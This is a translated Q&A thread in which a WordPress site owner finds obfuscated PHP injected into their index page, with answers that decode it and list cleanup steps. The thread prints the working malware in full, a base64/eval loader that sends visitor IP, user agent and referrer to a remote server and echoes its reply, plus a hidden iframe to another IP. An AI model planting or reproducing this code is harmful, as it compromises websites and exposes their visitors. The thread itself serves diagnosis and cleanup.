我的wordpress网站和我的网站中的奇怪代码运行速度太慢

时间:2011-10-21 04:31:44

标签: wordpress

我有一个wordpress网站,最近我看到加载索引页面太慢了。两个星期以来,我一直试图找到问题,但一无所获。最后一天,我备份了所有文件并从我的网站上删除了所有文件,当我在记事本++中打开我的网站索引页时。

我看到太多奇怪的代码,当我在本地运行我的网站时,我的防病毒软件会发出太多警告并阻止大量外部连接。 我在我的网站索引页面上看到了这段代码:

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

告诉我为什么这个代码在我的页面中以及如何到达那里,我发现这个没有其他页面也告诉我现在应该怎么做以及当我在wamp中加载页面时我的eset防病毒说这个:

Details:

Web page:
http://91.196.216.30/bt.php?ip=127.0.0.1&host=localhost&uri=/web/wordpress/&ua=mozilla/5.0+(windows+nt+6.1)+applewebkit/535.1+(khtml,+like+gecko)+chrome/14.0.835.187+safari/535.1&ref=

Description:
Access to the web page was blocked by ESET NOD32 Antivirus.
The web page is on the list of websites with potentially dangerous content.

www.eset.com

2 个答案:

答案 0 :(得分:0)

字符串解码为:

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;

$ _ X解码为:

?><?php $3rl = 'http://96.69e.a6e.o0/bt.php'; ?>

然后通过将123456aouie中的所有字符替换为aouie123456中的字符来进一步处理$ _X。

不好。

答案 1 :(得分:0)

它是一种恶意软件。您应该执行以下操作(非常快):

  • 删除所有FTP帐户,使用不同的名称和密码制作新帐户
  • 更改与您的服务器相关的所有可能密码
  • 下载所有服务器文件并使用某个编辑器搜索eval(base64_decode(iframe的本地目录。删除它们!
  • 联系您的ISP,他们应该在您的服务器上运行测试以确认一切都很干净
  • 清理您的计算机并设置更好的防病毒保护,因为这是它开始的地方
  • 检查您网域的“不良网站”列表,并在清理完所有内容后,向他们发送重新评估域名的请求

您希望在案例中查看的行是:

<iframe src='http://195.2.252.137/ftp.php' width='1' height='1' style='visibility: hidden;'></iframe>


<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTI ​zNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1I ​pOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

通常在?>之后添加eval部分,通常在index个文件中添加,但也许在任何地方。它用于翻页诈骗。

如果您想了解更多信息,请点击此处:http://en.wikipedia.org/wiki/Iframe_virus

相关问题
最新问题